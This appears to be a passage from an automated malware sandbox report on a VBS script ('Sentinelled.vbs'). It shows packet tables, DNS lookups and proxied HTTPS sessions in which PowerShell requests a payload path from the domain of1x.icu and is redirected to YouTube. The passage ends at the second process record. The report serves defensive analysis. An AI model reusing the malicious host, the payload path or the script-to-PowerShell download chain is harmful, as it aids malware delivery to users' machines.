Dec 20, 2024 17:42:40.455218077 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:40.455229998 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.455913067 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.455976009 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:40.455991983 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.463267088 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.463326931 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:40.463340044 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.463762045 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.463789940 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.463818073 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:40.463835001 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.463881016 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:40.464615107 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.479480028 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.479547024 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:40.479568958 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.480000019 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.480031967 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.480056047 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:40.480088949 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.480166912 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:40.480837107 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.493288040 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.493357897 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:40.493386984 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.493627071 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.493680954 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:40.493695974 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.494663954 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.494716883 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:40.494731903 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.508985043 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.509057045 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:40.509073019 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.509484053 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.509540081 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:40.509552002 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.509845972 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:40.509866953 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.509887934 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:40.509929895 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:40.509973049 CET	49704	443	192.168.2.7	142.250.181.110

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 17:42:27.261513948 CET	60505	53	192.168.2.7	1.1.1.1
Dec 20, 2024 17:42:27.565164089 CET	53	60505	1.1.1.1	192.168.2.7
Dec 20, 2024 17:42:29.648641109 CET	58385	53	192.168.2.7	1.1.1.1
Dec 20, 2024 17:42:29.786720991 CET	53	58385	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 20, 2024 17:42:27.261513948 CET	192.168.2.7	1.1.1.1	0x56d5	Standard query (0)	of1x.icu	A (IP address)	IN (0x0001)	false
Dec 20, 2024 17:42:29.648641109 CET	192.168.2.7	1.1.1.1	0x717f	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 20, 2024 17:42:27.565164089 CET	1.1.1.1	192.168.2.7	0x56d5	No error (0)	of1x.icu		104.21.86.72	A (IP address)	IN (0x0001)	false
Dec 20, 2024 17:42:27.565164089 CET	1.1.1.1	192.168.2.7	0x56d5	No error (0)	of1x.icu		172.67.216.143	A (IP address)	IN (0x0001)	false
Dec 20, 2024 17:42:29.786720991 CET	1.1.1.1	192.168.2.7	0x717f	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 17:42:29.786720991 CET	1.1.1.1	192.168.2.7	0x717f	No error (0)	youtube-ui.l.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 20, 2024 17:42:29.786720991 CET	1.1.1.1	192.168.2.7	0x717f	No error (0)	youtube-ui.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 20, 2024 17:42:29.786720991 CET	1.1.1.1	192.168.2.7	0x717f	No error (0)	youtube-ui.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 20, 2024 17:42:29.786720991 CET	1.1.1.1	192.168.2.7	0x717f	No error (0)	youtube-ui.l.google.com		172.217.19.174	A (IP address)	IN (0x0001)	false
Dec 20, 2024 17:42:29.786720991 CET	1.1.1.1	192.168.2.7	0x717f	No error (0)	youtube-ui.l.google.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 20, 2024 17:42:29.786720991 CET	1.1.1.1	192.168.2.7	0x717f	No error (0)	youtube-ui.l.google.com		216.58.208.238	A (IP address)	IN (0x0001)	false
Dec 20, 2024 17:42:29.786720991 CET	1.1.1.1	192.168.2.7	0x717f	No error (0)	youtube-ui.l.google.com		172.217.19.14	A (IP address)	IN (0x0001)	false
Dec 20, 2024 17:42:29.786720991 CET	1.1.1.1	192.168.2.7	0x717f	No error (0)	youtube-ui.l.google.com		142.250.181.46	A (IP address)	IN (0x0001)	false
Dec 20, 2024 17:42:29.786720991 CET	1.1.1.1	192.168.2.7	0x717f	No error (0)	youtube-ui.l.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 20, 2024 17:42:29.786720991 CET	1.1.1.1	192.168.2.7	0x717f	No error (0)	youtube-ui.l.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Dec 20, 2024 17:42:29.786720991 CET	1.1.1.1	192.168.2.7	0x717f	No error (0)	youtube-ui.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

of1x.icu

www.youtube.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49701	104.21.86.72	443	2104	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 16:42:28 UTC	174	OUT	GET /YkHfhYCF/gliadines.pfb HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: of1x.icu Connection: Keep-Alive
2024-12-20 16:42:29 UTC	841	IN	HTTP/1.1 302 Found Date: Fri, 20 Dec 2024 16:42:29 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: https://www.youtube.com/watch?v=oHg5SJYRHA0 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nc%2F3ysY9WgQGbkwXWAzNVbROSmYxn50GQH9VthpwtKMUz8%2B02CpkYvvwBZyer1pAC1G6LvN%2BrTQS2eFXaCLbaCJZAC786vIMBsd3L3EsMNnmkvRJMBxp%2BVYY7A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5115fbdd254364-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1586&rtt_var=606&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=788&delivery_rate=1787025&cwnd=206&unsent_bytes=0&cid=b24e113011235850&ts=709&x=0"
2024-12-20 16:42:29 UTC	72	IN	Data Raw: 34 32 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 77 61 74 63 68 3f 76 3d 6f 48 67 35 53 4a 59 52 48 41 30 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a 0d 0a Data Ascii: 42<a href="https://www.youtube.com/watch?v=oHg5SJYRHA0">Found</a>.
2024-12-20 16:42:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49702	104.21.86.72	443	2104	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 16:42:35 UTC	56	OUT	GET /YkHfhYCF/gliadines.pfb HTTP/1.1 Host: of1x.icu
2024-12-20 16:42:35 UTC	839	IN	HTTP/1.1 302 Found Date: Fri, 20 Dec 2024 16:42:35 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: https://www.youtube.com/watch?v=oHg5SJYRHA0 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FKClxiyPcZgcUX48c4YEBR5%2FyTbOiR3uCKkDme4WrT0smI7HH0JsZ6j3ti%2F3Zftl4wKvGOnqUmYbEQKi3SkBhRfSJTIe12eLfrmKrq0H8Zph4vueFaSgyDrSFw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5116242c680f9d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1494&min_rtt=1490&rtt_var=568&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=694&delivery_rate=1910994&cwnd=193&unsent_bytes=0&cid=2038e23f3e42436d&ts=714&x=0"
2024-12-20 16:42:35 UTC	72	IN	Data Raw: 34 32 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 77 61 74 63 68 3f 76 3d 6f 48 67 35 53 4a 59 52 48 41 30 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a 0d 0a Data Ascii: 42<a href="https://www.youtube.com/watch?v=oHg5SJYRHA0">Found</a>.
2024-12-20 16:42:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49704	142.250.181.110	443	2104	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 16:42:37 UTC	84	OUT	GET /watch?v=oHg5SJYRHA0 HTTP/1.1 Host: www.youtube.com Connection: Keep-Alive
2024-12-20 16:42:38 UTC	1856	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 20 Dec 2024 16:42:38 GMT Strict-Transport-Security: max-age=31536000 X-Frame-Options: SAMEORIGIN Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Origin-Trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="youtube_main" Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]} Content-Security-Policy: require-trusted-types-for 'script' P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info." Server: ESF X-XSS-Protection: 0 Set-Cookie: GPS=1; Domain=.youtube.com; Expires=Fri, 20-Dec-2024 17:12:38 GMT; Path=/; Secure; HttpOnly Set-Cookie: YSC=uVxh0C56rSI; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none Set-Cookie: VISITOR_INFO1_LIVE=ACPCe39gxpw; Domain=.youtube.com; Expires=Wed, 18-Jun-2025 16:42:38 GMT; Path=/; Secure; HttpOnly; SameSite=none Set-Cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgJA%3D%3D; Domain=.youtube.com; Expires=Wed, 18-Jun-2025 16:42:38 GMT; Path=/; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-20 16:42:38 UTC	1856	IN	Data Raw: 32 33 32 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 72 6b 65 72 2d 64 61 72 6b 2d 74 68 65 6d 65 20 64 61 72 6b 65 72 2d 64 61 72 6b 2d 74 68 65 6d 65 2d 64 65 70 72 65 63 61 74 65 20 73 79 73 74 65 6d 2d 69 63 6f 6e 73 20 74 79 70 6f 67 72 61 70 68 79 20 74 79 70 6f 67 72 61 70 68 79 2d 73 70 61 63 69 6e 67 20 72 65 66 72 65 73 68 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 64 61 74 61 2d 69 64 3d 22 5f 67 64 22 20 6e 6f 6e 63 65 3d 22 6e 41 63 32 45 55 5a 62 6e 7a 31 6c 77 4e 67 58 4a 43 31 2d 50 41 Data Ascii: 2321<!DOCTYPE html><html style="font-size: 10px;font-family: Roboto, Arial, sans-serif;" lang="en" darker-dark-theme darker-dark-theme-deprecate system-icons typography typography-spacing refresh><head><script data-id="_gd" nonce="nAc2EUZbnz1lwNgXJC1-PA
2024-12-20 16:42:38 UTC	1856	IN	Data Raw: 6d 65 73 73 61 67 65 7c 7c 6d 65 73 73 61 67 65 20 69 6e 20 77 69 6e 64 6f 77 2e 75 6e 68 61 6e 64 6c 65 64 45 72 72 6f 72 4d 65 73 73 61 67 65 73 7c 7c 77 69 6e 64 6f 77 2e 75 6e 68 61 6e 64 6c 65 64 45 72 72 6f 72 43 6f 75 6e 74 3e 3d 35 29 72 65 74 75 72 6e 3b 77 69 6e 64 6f 77 2e 75 6e 68 61 6e 64 6c 65 64 45 72 72 6f 72 43 6f 75 6e 74 2b 3d 31 3b 77 69 6e 64 6f 77 2e 75 6e 68 61 6e 64 6c 65 64 45 72 72 6f 72 4d 65 73 73 61 67 65 73 5b 6d 65 73 73 61 67 65 5d 3d 74 72 75 65 3b 76 61 72 20 69 6d 67 3d 6e 65 77 20 49 6d 61 67 65 3b 77 69 6e 64 6f 77 2e 65 6d 65 72 67 65 6e 63 79 54 69 6d 65 6f 75 74 49 6d 67 3d 69 6d 67 3b 69 6d 67 2e 6f 6e 6c 6f 61 64 3d 69 6d 67 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 77 69 6e Data Ascii: message\|\|message in window.unhandledErrorMessages\|\|window.unhandledErrorCount>=5)return;window.unhandledErrorCount+=1;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete win
2024-12-20 16:42:38 UTC	1856	IN	Data Raw: 73 28 70 2c 77 69 6e 64 6f 77 5b 22 50 6f 6c 79 6d 65 72 22 5d 2e 42 61 73 65 44 65 73 63 72 69 70 74 6f 72 73 29 7d 63 61 74 63 68 28 65 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 50 6f 6c 79 6d 65 72 20 64 65 66 69 6e 65 20 70 72 6f 70 65 72 74 79 20 66 61 69 6c 65 64 20 66 6f 72 20 22 2b 0a 4f 62 6a 65 63 74 2e 6b 65 79 73 28 70 29 29 3b 7d 74 68 69 73 2e 5f 6e 61 74 69 76 65 50 72 6f 74 6f 74 79 70 65 73 5b 74 61 67 5d 3d 70 7d 72 65 74 75 72 6e 20 70 7d 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 50 6f 6c 79 6d 65 72 45 72 72 6f 72 28 6d 73 67 29 7b 77 69 6e 64 6f 77 2e 6f 6e 65 72 72 6f 72 28 6d 73 67 2c 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2c 30 2c 30 2c 6e 65 77 20 45 72 72 6f 72 28 41 72 72 61 79 2e 70 72 6f Data Ascii: s(p,window["Polymer"].BaseDescriptors)}catch(e){throw new Error("Polymer define property failed for "+Object.keys(p));}this._nativePrototypes[tag]=p}return p}function handlePolymerError(msg){window.onerror(msg,window.location.href,0,0,new Error(Array.pro
2024-12-20 16:42:38 UTC	1856	IN	Data Raw: 74 75 62 65 2e 63 6f 6d 2f 73 2f 64 65 73 6b 74 6f 70 2f 63 30 31 65 61 37 65 33 2f 69 6d 67 2f 6c 6f 67 6f 73 2f 66 61 76 69 63 6f 6e 5f 39 36 78 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 73 2f 64 65 73 6b 74 6f 70 2f 63 30 31 65 61 37 65 33 2f 69 6d 67 2f 6c 6f 67 6f 73 2f 66 61 76 69 63 6f 6e 5f 31 34 34 78 31 34 34 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 34 34 78 31 34 34 22 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 6e 41 63 32 45 55 5a 62 6e 7a 31 6c 77 4e 67 58 4a 43 31 2d 50 41 22 3e 69 66 20 28 27 75 6e 64 65 66 69 6e 65 64 27 20 3d 3d 20 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c Data Ascii: tube.com/s/desktop/c01ea7e3/img/logos/favicon_96x96.png" sizes="96x96"><link rel="icon" href="https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon_144x144.png" sizes="144x144"><script nonce="nAc2EUZbnz1lwNgXJC1-PA">if ('undefined' == typeof Symbol
2024-12-20 16:42:38 UTC	1577	IN	Data Raw: 65 22 3b 69 66 28 69 73 50 72 65 72 65 6e 64 65 72 29 7b 76 61 72 20 73 74 61 72 74 54 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 79 74 63 73 69 2e 73 65 74 53 74 61 72 74 28 29 3b 64 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 76 4e 61 6d 65 2c 73 74 61 72 74 54 69 63 6b 29 7d 3b 64 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 76 4e 61 6d 65 2c 73 74 61 72 74 54 69 63 6b 2c 66 61 6c 73 65 29 7d 69 66 28 64 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 64 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 76 4e 61 6d 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 79 74 63 73 69 2e 74 69 63 6b 28 22 76 63 22 29 7d 2c 0a 66 61 6c 73 65 29 3b 69 66 28 69 73 47 65 63 6b 6f 28 29 29 7b 76 61 72 20 69 73 48 69 64 64 65 6e 3d 28 Data Ascii: e";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick("vc")},false);if(isGecko()){var isHidden=(
2024-12-20 16:42:38 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 7b 22 43 4c 49 45 4e 54 5f 43 41 4e 41 52 59 5f 53 54 41 54 45 22 3a 22 6e 6f 6e 65 22 2c 22 44 45 56 49 43 45 22 3a 22 63 65 6e 67 5c 75 30 30 33 64 55 53 45 52 5f 44 45 46 49 4e 45 44 5c 75 30 30 32 36 63 70 6c 61 74 66 6f 72 6d 5c 75 30 30 33 64 44 45 53 4b 54 4f 50 22 2c 22 44 49 53 41 42 4c 45 5f 59 54 5f 49 4d 47 5f 44 45 4c 41 59 5f 4c 4f 41 44 49 4e 47 22 3a 66 61 6c 73 65 2c 22 45 4c 45 4d 45 4e 54 5f 50 4f 4f 4c 5f 44 45 46 41 55 4c 54 5f 43 41 50 22 3a 37 35 2c 22 45 56 45 4e 54 5f 49 44 22 3a 22 66 70 35 6c 5a 35 72 43 43 75 72 35 76 64 49 50 6c 72 50 67 69 51 45 22 2c 22 45 58 50 45 52 49 4d 45 4e 54 5f 46 4c 41 47 53 22 3a 7b 22 48 35 5f 65 6e 61 62 6c 65 5f 66 75 6c 6c 5f 70 61 63 66 5f 6c 6f 67 67 69 6e 67 22 3a 74 72 75 Data Ascii: 8000{"CLIENT_CANARY_STATE":"none","DEVICE":"ceng\u003dUSER_DEFINED\u0026cplatform\u003dDESKTOP","DISABLE_YT_IMG_DELAY_LOADING":false,"ELEMENT_POOL_DEFAULT_CAP":75,"EVENT_ID":"fp5lZ5rCCur5vdIPlrPgiQE","EXPERIMENT_FLAGS":{"H5_enable_full_pacf_logging":tru
2024-12-20 16:42:38 UTC	1390	IN	Data Raw: 6d 70 61 6e 65 6c 5f 63 6c 69 63 6b 5f 64 72 61 67 5f 73 63 72 6f 6c 6c 22 3a 74 72 75 65 2c 22 64 65 73 6b 74 6f 70 5f 65 6e 61 62 6c 65 5f 64 6d 70 61 6e 65 6c 5f 73 63 72 6f 6c 6c 22 3a 74 72 75 65 2c 22 64 65 73 6b 74 6f 70 5f 65 6e 61 62 6c 65 5f 64 6d 70 61 6e 65 6c 5f 77 68 65 65 6c 5f 73 63 72 6f 6c 6c 22 3a 74 72 75 65 2c 22 64 65 73 6b 74 6f 70 5f 6b 65 79 62 6f 61 72 64 5f 63 61 70 74 75 72 65 5f 6b 65 79 64 6f 77 6e 5f 6b 69 6c 6c 73 77 69 74 63 68 22 3a 74 72 75 65 2c 22 64 65 73 6b 74 6f 70 5f 6d 69 78 5f 75 73 65 5f 73 61 6d 70 6c 65 64 5f 63 6f 6c 6f 72 5f 66 6f 72 5f 62 6f 74 74 6f 6d 5f 62 61 72 22 3a 74 72 75 65 2c 22 64 65 73 6b 74 6f 70 5f 6d 69 78 5f 75 73 65 5f 73 61 6d 70 6c 65 64 5f 63 6f 6c 6f 72 5f 66 6f 72 5f 62 6f 74 74 6f 6d Data Ascii: mpanel_click_drag_scroll":true,"desktop_enable_dmpanel_scroll":true,"desktop_enable_dmpanel_wheel_scroll":true,"desktop_keyboard_capture_keydown_killswitch":true,"desktop_mix_use_sampled_color_for_bottom_bar":true,"desktop_mix_use_sampled_color_for_bottom
2024-12-20 16:42:38 UTC	1390	IN	Data Raw: 65 64 5f 73 74 72 69 6e 67 5f 6b 69 6c 6c 73 77 69 74 63 68 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 5f 61 62 5f 72 65 70 6f 72 74 5f 6f 6e 5f 65 72 72 6f 72 73 63 72 65 65 6e 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 5f 61 62 5f 72 70 5f 69 6e 74 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 5f 61 63 74 69 76 65 5f 76 69 65 77 5f 64 69 73 70 6c 61 79 5f 61 64 5f 72 65 6e 64 65 72 65 72 5f 77 65 62 5f 68 6f 6d 65 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 5f 61 64 5f 63 6f 6e 74 65 78 74 5f 69 6e 5f 76 73 73 5f 70 69 6e 67 73 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 5f 61 64 73 5f 77 65 62 5f 65 70 5f 62 75 65 6e 6f 73 5f 61 69 72 65 73 5f 61 6e 64 5f 70 61 64 64 69 6e 67 5f 66 69 78 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 5f 61 73 79 6e 63 5f 61 62 5f 65 Data Ascii: ed_string_killswitch":true,"enable_ab_report_on_errorscreen":true,"enable_ab_rp_int":true,"enable_active_view_display_ad_renderer_web_home":true,"enable_ad_context_in_vss_pings":true,"enable_ads_web_ep_buenos_aires_and_padding_fix":true,"enable_async_ab_e
2024-12-20 16:42:38 UTC	1390	IN	Data Raw: 65 2c 22 65 6e 61 62 6c 65 5f 66 69 72 73 74 5f 70 61 72 74 79 5f 61 75 74 68 5f 76 32 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 5f 66 6c 6f 77 5f 6c 6f 67 67 69 6e 67 5f 70 34 65 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 5f 66 75 6c 6c 79 5f 72 65 61 63 74 69 76 65 5f 62 61 64 67 65 5f 73 68 61 70 65 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 5f 66 75 6c 6c 79 5f 72 65 61 63 74 69 76 65 5f 63 68 69 70 5f 73 68 61 70 65 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 5f 66 75 6c 6c 79 5f 72 65 61 63 74 69 76 65 5f 63 68 69 70 5f 76 69 65 77 5f 6d 6f 64 65 6c 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 5f 67 61 6d 65 70 6c 61 79 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 5f 67 65 6c 5f 6c 6f 67 5f 63 6f 6d 6d 61 6e 64 73 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 5f Data Ascii: e,"enable_first_party_auth_v2":true,"enable_flow_logging_p4e":true,"enable_fully_reactive_badge_shape":true,"enable_fully_reactive_chip_shape":true,"enable_fully_reactive_chip_view_model":true,"enable_gameplay":true,"enable_gel_log_commands":true,"enable_
2024-12-20 16:42:38 UTC	1390	IN	Data Raw: 70 6c 61 79 61 62 6c 65 73 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 5f 6e 65 74 77 6f 72 6b 5f 72 65 71 75 65 73 74 5f 6c 6f 67 67 69 6e 67 5f 6f 6e 5f 67 61 6d 65 5f 65 76 65 6e 74 73 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 5f 6e 65 77 5f 63 68 61 6e 6e 65 6c 5f 63 72 65 61 74 69 6f 6e 5f 66 6f 72 5f 69 64 34 61 6c 6c 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 5f 6f 62 74 61 69 6e 69 6e 67 5f 70 70 6e 5f 71 75 65 72 79 5f 70 61 72 61 6d 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 5f 6f 6e 5f 70 61 75 73 65 5f 72 65 73 75 6d 65 5f 6d 65 73 73 61 67 65 5f 68 61 6e 64 6c 69 6e 67 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 5f 6f 6e 5f 79 74 5f 63 6f 6d 6d 61 6e 64 5f 65 78 65 63 75 74 6f 72 5f 63 6f 6d 6d 61 6e 64 5f 74 6f 5f 6e 61 76 69 67 61 74 65 22 3a 74 Data Ascii: playables":true,"enable_network_request_logging_on_game_events":true,"enable_new_channel_creation_for_id4all":true,"enable_obtaining_ppn_query_param":true,"enable_on_pause_resume_message_handling":true,"enable_on_yt_command_executor_command_to_navigate":t

Target ID:	1
Start time:	11:42:19
Start date:	20/12/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sentinelled.vbs"
Imagebase:	0x7ff6bdf90000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:42:21
Start date:	20/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
